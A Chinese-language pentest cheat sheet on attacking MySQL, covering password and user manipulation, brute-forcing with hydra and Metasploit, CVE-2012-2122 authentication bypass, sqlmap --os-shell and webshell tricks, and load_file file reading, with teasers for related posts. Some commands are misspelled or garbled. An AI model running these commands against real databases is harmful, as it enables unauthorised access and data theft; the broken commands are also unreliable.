這裡以kali 中的mysql 做演示
mysql 的賬號密碼
放在mysql 庫中的 user 和 password
給root 增加密碼
update mysql.user set password=password('echod') where user='root';
增添mysql 使用者
insert into mysql.user(host,user,password) values('%','echod',password('111111'))
mysql 拒絕服務
show glabol variables like '%max_connect_errors%' ; 設定乙個ip 會話限制
更改會話限制
set glabol max_connect_errors = 111111111; 資料為int型別
msf爆破mysql 密碼
hydra -l /games/user.txt -p /games/passwd.txt mysql: v8.6 (c) 2017 by van hauser/thc - please do not use in military or secret service organizations, or for illegal purposes.
hydra 爆破mysql 密碼
mysql cve-2012-2122
當連線mariadb/mysql時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回乙個非零值,也會使mysql認為兩個密碼是相同的。 也就是說只要知道使用者名稱,不斷嘗試就能夠直接登入sql資料庫。按照公告說法大約256次就能夠矇對一次。而且漏洞利用工具已經出現。 受影響的產品: all mariadb and mysql versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
mysql 在知道密碼的情況下的getshell方法
日誌 getshell (webshell)
sqlmap os-shell 可以順帶提權
sqlmap -d "mysql:" --os-shell
sqlmap -d "mysql://user:passwd@host:port/database" --os-shell
mysql 讀取檔案
select load_file(『path』);
滲透測試之漏洞驗證篇
msf 是乙個滲透測試利用框架,在這個框架中整合了很多漏洞檢測和利用的指令碼工具,可以讓我們直接利用,省去了在網路中查詢指令碼的時間。msf 資料庫為 postgresql,在使用時要保證其是開啟的 確定使用的指令碼工具,可以通過search來搜尋 使用對應的指令碼,use 搜尋序號 或use 指令...
域滲透 Kerberos身份驗證流程
在 kerberos 協議中主要是有三個角色的存在 1.訪問服務的 client 2.提供服務的 server 3.kdc key distribution center 金鑰分發中心 注意 1 kdc 服務缺省會安裝在乙個域的域控中 2 從物理層面看,ad與kdc均為域控制器 domain con...
web滲透 39 驗證碼功能缺陷
驗證碼就是每次訪問頁面時隨機生成的,內容一般是數字和字母 更 點的有中文,現在已經公升級到,動畫等驗證碼 需要訪問者把圖中的數字字母填到表單中提交,這樣就有效地防止了暴力破解。驗證碼也用於防止惡意灌水 廣告帖等。在登陸的地方訪問乙個指令碼檔案,該檔案生成含驗證碼的並將值寫入到session裡,提交的...